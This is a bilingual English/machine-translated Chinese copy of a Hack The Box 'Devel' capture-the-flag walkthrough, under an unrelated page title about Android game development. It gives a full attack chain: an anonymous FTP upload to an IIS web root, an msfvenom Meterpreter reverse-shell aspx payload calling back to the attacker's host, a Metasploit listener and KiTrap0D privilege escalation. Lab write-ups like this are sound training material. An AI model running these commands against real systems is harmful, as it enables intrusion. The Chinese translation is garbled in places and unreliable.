安卓游戲開發(fā)推箱子

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一個(gè)在線平臺(tái)，可讓您測試滲透測試技能。 它包含一些不斷更新的挑戰(zhàn)。 其中一些模擬現(xiàn)實(shí)世界的場景，而另一些則更傾向于CTF的挑戰(zhàn)風(fēng)格。

Note. Only write-ups of retired HTB machines are allowed.

注意 。 只允許注銷HTB機(jī)器。

Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Devel被描述為一個(gè)相對(duì)簡單的方框，它展示了與某些默認(rèn)程序配置相關(guān)的安全風(fēng)險(xiǎn)。 它是初學(xué)者級(jí)別的機(jī)器，可以使用公開的漏洞利用來完成。

We will use the following tools to pawn the box on a Kali Linux box

我們將使用以下工具將盒子當(dāng)成Kali Linux盒子

• nmap

  納帕

• zenmap

  禪地圖

• searchsploit

  searchsploit

• metasploit

  元胞

• msfvenom

  毒液

第1步-掃描網(wǎng)絡(luò) (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

開發(fā)機(jī)器之前的第一步是進(jìn)行一些掃描和偵察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

這是最重要的部分之一，因?yàn)樗鼘Q定您以后可以嘗試?yán)玫膬?nèi)容。 最好在該階段花費(fèi)更多時(shí)間以獲取盡可能多的信息。

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我將使用Nmap (網(wǎng)絡(luò)映射器)，這是一個(gè)免費(fèi)的開源實(shí)用程序，用于網(wǎng)絡(luò)發(fā)現(xiàn)和安全審核。 它使用原始IP數(shù)據(jù)包來確定網(wǎng)絡(luò)上可用的主機(jī)，這些主機(jī)提供的服務(wù)，它們正在運(yùn)行的操作系統(tǒng)，使用的數(shù)據(jù)包過濾器/防火墻的類型以及許多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用許多命令來掃描網(wǎng)絡(luò)。 如果您想了解更多信息，可以在這里查看文檔。

I use the following command to get a basic idea of what we are scanning

我使用以下命令來了解我們正在掃描的內(nèi)容

nmap -sV -O -F --version-light 10.10.10.5

-sV: Probe open ports to determine service/version info

-sV：探測打開的端口以確定服務(wù)/版本信息

-O: Enable OS detection

-O：啟用操作系統(tǒng)檢測

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-掃描的端口少于默認(rèn)掃描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制為最可能的探測(強(qiáng)度2)

10.10.10.5: IP address of the Devel box

10.10.10。 5 ：開發(fā)箱的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您還可以使用Zenmap ，這是官方的Nmap Security Scanner GUI。 它是一個(gè)多平臺(tái)，免費(fèi)和開源的應(yīng)用程序，旨在使Nmap易于初學(xué)者使用，同時(shí)為經(jīng)驗(yàn)豐富的Nmap用戶提供高級(jí)功能。

I use a different set of commands to perform an intensive scan

我使用一組不同的命令來執(zhí)行密集掃描

nmap -A -v 10.10.10.5

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：啟用操作系統(tǒng)檢測，版本檢測，腳本掃描和跟蹤路由

-v: Increase verbosity level

-v：提高詳細(xì)程度

10.10.10.5: IP address of the Devel box

10.10.10.5：開發(fā)箱的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

如果發(fā)現(xiàn)結(jié)果有點(diǎn)不堪重負(fù)，則可以移至“ 端口/主機(jī)”選項(xiàng)卡以僅獲取打開的端口。

We can see that there are 2 open ports:

我們可以看到有2個(gè)開放端口：

Port 21. File Transfer Protocol (FTP) control (command). Here it's a Microsoft FTP

端口 21 。 文件傳輸協(xié)議(FTP)控件(命令)。 這是Microsoft FTP

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an IIS server

端口 80 。 超文本傳輸??協(xié)議(HTTP)。 這是IIS服務(wù)器

The most likely initial attack vector appears to be the FTP in this case

在這種情況下，最有可能的初始攻擊媒介似乎是FTP

第2步-易受攻擊的FTP (Step 2 - The vulnerable FTP)

We open Firefox and visit the website at http://10.10.10.5

我們打開Firefox并訪問http://10.10.10.5的網(wǎng)站

From the reconnaissance phase, we found 2 files under the Microsoft FTP. Let's see if we can access them from the browser.

從偵查階段開始，我們?cè)贛icrosoft FTP下找到了2個(gè)文件。 讓我們看看是否可以從瀏覽器訪問它們。

I can access the welcome.png image file by visiting

我可以通過訪問訪問welcome.png圖像文件

http://10.10.10.5/welcome.png

I can also access the iisstart.htm page

我也可以訪問iisstart.htm頁面

http://10.10.10.5/iisstart.htm

We now know two things:

現(xiàn)在，我們知道兩件事：

• The FTP is used as a file directory for the web server - discovered when we accessed the files from the recon phase.
  FTP用作Web服務(wù)器的文件目錄-在我們從偵察階段訪問文件時(shí)發(fā)現(xiàn)。

• The FTP allows anonymous login - discovered when we performed the intense scan.
  FTP允許匿名登錄-在我們執(zhí)行密集掃描時(shí)發(fā)現(xiàn)。

Let's see if we can create a file and add it to the FTP

讓我們看看是否可以創(chuàng)建文件并將其添加到FTP

I create a file by using this command and output the result to a file called htb.html

我使用此命令創(chuàng)建文件，并將結(jié)果輸出到名為htb.html的文件中

echo HackTheBox > htb.html

I then check with ls if the file has been created and what is the content of the file with this command

然后，我用ls檢查該文件是否已創(chuàng)建以及該命令的文件內(nèi)容是什么

cat htb.html

Let's now connect to the FTP to add our test file

現(xiàn)在，我們連接到FTP以添加我們的測試文件

To connect to the FTP, I use this command

要連接到FTP，我使用以下命令

ftp 10.10.10.5

I type anonymous as the username and just press enter for the password, as it allows anonymous login.

我輸入匿名作為用戶名，然后按Enter鍵輸入密碼，因?yàn)樗试S匿名登錄。

I am now connected to the FTP.

我現(xiàn)在已連接到FTP。

I add the file on the FTP with this command

我使用此命令將文件添加到FTP

put htb.html

The file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.

文件已成功發(fā)送。 讓我們檢查是否可以從Firefox訪問它。 我訪問了該頁面，我們可以在網(wǎng)頁上看到輸出HackTheBox 。

http://10.10.10.5/htb.html

Now that we know we can send over files, let's craft an exploit!

現(xiàn)在我們知道可以發(fā)送文件了，讓我們來設(shè)計(jì)一個(gè)漏洞利用程序！

第3步-使用MSFvenom進(jìn)行漏洞利用 (Step 3 - Using MSFvenom to craft an exploit)

We will use MSFvenom, which is a payload generator . You can learn more about it here

我們將使用MSFvenom，它是有效負(fù)載生成器。 您可以在此處了解更多信息

But first, let's check on Metasploit Framework which payload we will need to craft our exploit.

但是首先，讓我們檢查一下Metasploit Framework制作漏洞利用程序所需的有效負(fù)載。

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

我們知道我們需要?jiǎng)?chuàng)建一個(gè)反向shell ，這是目標(biāo)計(jì)算機(jī)與攻擊計(jì)算機(jī)進(jìn)行通信的一種shell。 攻擊機(jī)具有一個(gè)偵聽器端口，在偵聽器端口上接收連接，通過使用該連接，可以執(zhí)行代碼或命令。

The reverse TCP shell should be for Windows and we will use Meterpreter.

反向TCP Shell應(yīng)該用于Windows，我們將使用Meterpreter 。

From the Offensive Security website, we get this definition for Meterpreter

從“進(jìn)攻性安全”網(wǎng)站上，我們獲得了Meterpreter的定義

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一種高級(jí)的，動(dòng)態(tài)可擴(kuò)展的有效負(fù)載，它使用內(nèi)存中的 DLL注入暫存器，并在運(yùn)行時(shí)通過網(wǎng)絡(luò)進(jìn)行了擴(kuò)展。 它通過暫存器套接字進(jìn)行通信，并提供全面的客戶端Ruby API。 它具有命令歷史記錄，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此處閱讀有關(guān)Meterpreter的更多信息。

I launch Metasploit and search for reverse TCP payloads. I use the following command

我啟動(dòng)Metasploit并搜索反向TCP有效負(fù)載。 我使用以下命令

search windows/meterpreter/reverse_tcp

We find an interesting payload, number 2, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker

我們找到了一個(gè)有趣的有效負(fù)載，編號(hào)2，它是反向TCP階段程序 。 該有效負(fù)載通過Reflective Dll Injection有效負(fù)載注入抄表器服務(wù)器DLL，并連接回攻擊者

payload/windows/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit. And more specifically an aspx reverse shell. This piece of information has been collected during recon phase

現(xiàn)在讓我們回到msfvenom來設(shè)計(jì)我們的漏洞利用程序。 更具體地說是aspx反向外殼。 這條信息是在偵察階段收集的

I use the following command

我使用以下命令

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

- P：有效載荷來使用

-f: Output format

- F：輸出格式

-0: Save the payload to a file

- 0：保存有效載荷到一個(gè)文件

LHOST: Local host

LHOST ：本地主機(jī)

LPORT: Local port

LPORT ：本地端口

I then check with ls if the file has been created. It's time to send it over to the FTP

然后，我用ls檢查是否已創(chuàng)建文件。 是時(shí)候?qū)⑵浒l(fā)送到FTP了

Let's reconnect to the FTP and send our little gift!

讓我們重新連接到FTP并發(fā)送我們的小禮物！

I connect to the FTP, enter anonymous as a username, skip the password by pressing enter. I then send the file with the following command

我連接到FTP，輸入匿名作為用戶名，然后按Enter跳過密碼。 然后，我使用以下命令發(fā)送文件

put devel.aspx

Let's check if the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server with the following command

讓我們檢查文件是否已正確發(fā)送。 回到Firefox ，我使用以下命令導(dǎo)航到FTP服務(wù)器

ftp://10.10.10.5

We can see that our little gift is here!

我們可以看到我們的小禮物在這里！

Here is the exploit, if you're curious to know what it looks like

這是漏洞利用程序，如果您想知道它是什么樣子

第4步-使用Metasploit設(shè)置偵聽器 (Step 4 - Setting up a listener with Metasploit)

Back on Metasploit where I use the following command to set the payload handler

回到Metasploit，在這里我使用以下命令設(shè)置有效負(fù)載處理程序

use exploit/multi/handler

I check to see which options are available

我檢查一下哪些選項(xiàng)可用

We first set up the payload

我們首先設(shè)置有效載荷

set payload windows/meterpreter/reverse_tcp

Then the LHOST

然后LHOST

set lhost 10.10.14.15

And finally the LPORT

最后是LPORT

set lport 4444

If we check the options now, we should see that everything is set up

如果我們現(xiàn)在檢查選項(xiàng)，我們應(yīng)該看到一切都已設(shè)置

Let's run the exploit.

讓我們運(yùn)行漏洞利用程序。

After this message appears

此消息出現(xiàn)后

Started reverse TCP handler on 10.10.14.15:4444

go back to the browser and access the page where the malicious script is hosted

返回瀏覽器并訪問托管惡意腳本的頁面

http://10.10.10.5/devel.aspx

You should then see a Meterpreter session created

然后，您應(yīng)該看到一個(gè)Meterpreter會(huì)話已創(chuàng)建

Now that I have a session, I try to look for the first flag, user.txt using the following command on meterpreter

現(xiàn)在我已經(jīng)有了一個(gè)會(huì)話，我嘗試在meterpreter上使用以下命令查找第一個(gè)標(biāo)志user.txt

search -f user.txt

No files are matching my search. I try with .* to see other files, but nothing useful

沒有文件與我的搜索匹配。 我嘗試使用。*查看其他文件，但沒什么用

I then create a shell with the following command

然后，使用以下命令創(chuàng)建外殼

shell

I use the following command to get the system information

我使用以下命令獲取系統(tǒng)信息

systeminfo

We can see that the registered owner is called babis. This might an important piece of information when we will be looking for the user flag. We can also see that the machine doesn't have any hotfixes.

我們可以看到注冊(cè)所有者稱為babis 。 當(dāng)我們要尋找用戶標(biāo)志時(shí)，這可能是一條重要的信息。 我們還可以看到該機(jī)器沒有任何修補(bǔ)程序。

I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both gave me Access denied.

我開始瀏覽文件夾。 我使用dir列出所有文件/文件夾，并使用cd更改目錄。 我在babis和Administrator文件夾上嘗試過運(yùn)氣，但兩者均使我無法訪問。

We need to escalate privilege! Knowing that when we checked for the system information, no hotfixes were found, we can try to find exploits applicable to this machine.

我們需要提升特權(quán)！ 知道當(dāng)我們檢查系統(tǒng)信息時(shí)，找不到修補(bǔ)程序，因此我們可以嘗試查找適用于此計(jì)算機(jī)的漏洞利用程序。

步驟5-執(zhí)行特權(quán)升級(jí) (Step 5 - Performing Privilege Escalation)

I put the session in the background with this command

我使用此命令將會(huì)話置于后臺(tái)

background

I then use the following command

然后，我使用以下命令

use post/multi/recon/local_exploit_suggester

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter

本模塊建議可以使用的本地Meterpreter利用。 根據(jù)用戶打開外殼的體系結(jié)構(gòu)和平臺(tái)以及Meterpreter中的可用漏洞，建議利用漏洞

I check the options and I set the session

我檢查選項(xiàng)并設(shè)置會(huì)話

It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options

重要的是要注意，并非所有本地漏洞都會(huì)被解雇。 根據(jù)以下條件選擇漏洞利用：會(huì)話類型，平臺(tái)，體系結(jié)構(gòu)和所需的默認(rèn)選項(xiàng)

Going down the list

進(jìn)入清單

exploit/windows/local/bypassuac_eventvwr

fails due to the IIS user not being a part of the administrators group, which is the default and to be expected.

由于IIS用戶不是管理員組的一部分而失敗，這是默認(rèn)情況，這是預(yù)期的，因此失敗。

I use the next exploit on the list, which is

我使用列表中的下一個(gè)漏洞，即

use exploit/windows/local/ms10_015_kitrap0d

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

該模塊將通過Tavis Ormandy的KiTrap0D漏洞創(chuàng)建一個(gè)具有SYSTEM特權(quán)的新會(huì)話。 如果正在使用的會(huì)話已經(jīng)提升，則利用將無法運(yùn)行。 該模塊依賴kitrap0d.x86.dll，而Windows x64版本不支持該模塊。

When we ran the sysinfo in the Meterpreter session, it revealed that the target was x86 architecture

當(dāng)我們?cè)贛eterpreter會(huì)話中運(yùn)行sysinfo時(shí)，它表明目標(biāo)是x86體系結(jié)構(gòu)

I check the options and then set the session

我檢查選項(xiàng)，然后設(shè)置會(huì)話

I run the exploit.

我運(yùn)行漏洞利用程序。

The exploit was successful, but the session couldn't be created. This is because of the first line in the exploit trying to set up a reverse handler on the default eth0 and default port, and not the VPN interface for HTB labs.

該漏洞利用成功，但無法創(chuàng)建會(huì)話。 這是因?yàn)槁┒蠢玫牡谝恍性噲D在默認(rèn)的eth0和默認(rèn)端口(而不是HTB實(shí)驗(yàn)室的VPN接口)上設(shè)置反向處理程序。

Started reverse TCP handler on 10.0.2.15:4444

I check the options and set LHOST and LPORT

我檢查選項(xiàng)并設(shè)置LHOST和LPORT

I then check all the sessions alive with the following command, in case my session died

然后，使用以下命令檢查所有活動(dòng)會(huì)話，以防我的會(huì)話死亡

sessions -l

I can see my session

我可以看到我的會(huì)議

Now that we have a meterpreter session, let's start navigating the folder and find the flags!

現(xiàn)在我們有了一個(gè)抄表器會(huì)話，讓我們開始瀏覽該文件夾并找到標(biāo)記！

步驟6-尋找user.txt標(biāo)志 (Step 6 - Looking for the user.txt flag)

Let's first check where we are with the following command

我們首先使用以下命令檢查我們的位置

pwd

which stands for print work directory

代表打印工作目錄

I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit

我要到C：\和LS中的所有文件/文件夾。 我從步驟4-使用Metasploit設(shè)置偵聽器中的上一次嘗試中已經(jīng)知道要看的地方

I go back to the Users directory

我回到用戶目錄

Then move to the babis directory

然后移至babis目錄

From there, I go to the Desktop directory

從那里，我轉(zhuǎn)到桌面目錄

We found the user.txt.txt file! To read the content of the file I use the command

我們找到了user.txt.txt文件！ 要讀取文件的內(nèi)容，請(qǐng)使用以下命令

cat user.txt.txt

Now that we have the user flag, let's find the root flag!

現(xiàn)在有了用戶標(biāo)志，讓我們找到根標(biāo)志！

步驟7-尋找root.txt標(biāo)志 (Step 7 - Looking for the root.txt flag)

Going back to C:\ to navigate to the Administrator folder then the Desktop folder. I use ls to list all files under the Desktop folder

返回到C：\ ，導(dǎo)航到Administrator文件夾，然后導(dǎo)航到Desktop文件夾。 我使用ls列出“ 桌面”文件夾下的所有文件

We find the root.txt.txt file!

我們找到了root.txt.txt文件！

To read the content of the file I use the command

要讀取文件的內(nèi)容，請(qǐng)使用以下命令

cat root.txt.txt

Congrats! You found both flags!

恭喜！ 您找到了兩個(gè)標(biāo)志！

---

---

Please don’t hesitate to comment, ask questions or share with your friends :)

請(qǐng)不要猶豫，發(fā)表評(píng)論，提問或與您的朋友分享:)

You can see more of my articles here

您可以在這里看到更多我的文章

You can follow me on Twitter or on LinkedIn

您可以在Twitter或LinkedIn上關(guān)注我

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘記＃ GetSecure ，＃ BeSecure和＃StaySecure ！

---

---

Other Hack The Box articles

其他Hack The Box文章

• Keep Calm and Hack The Box - Lame

  保持冷靜并砍箱子-me腳

• Keep Calm and Hack The Box - Legacy

  保持冷靜并打破常規(guī)-舊版

• Keep Calm and Hack The Box - Beep

  保持冷靜并砍箱子-嗶

翻譯自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

安卓游戲開發(fā)推箱子

總結(jié)

以上是生活随笔為你收集整理的安卓游戏开发推箱子_保持冷静并砍箱子-开发的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。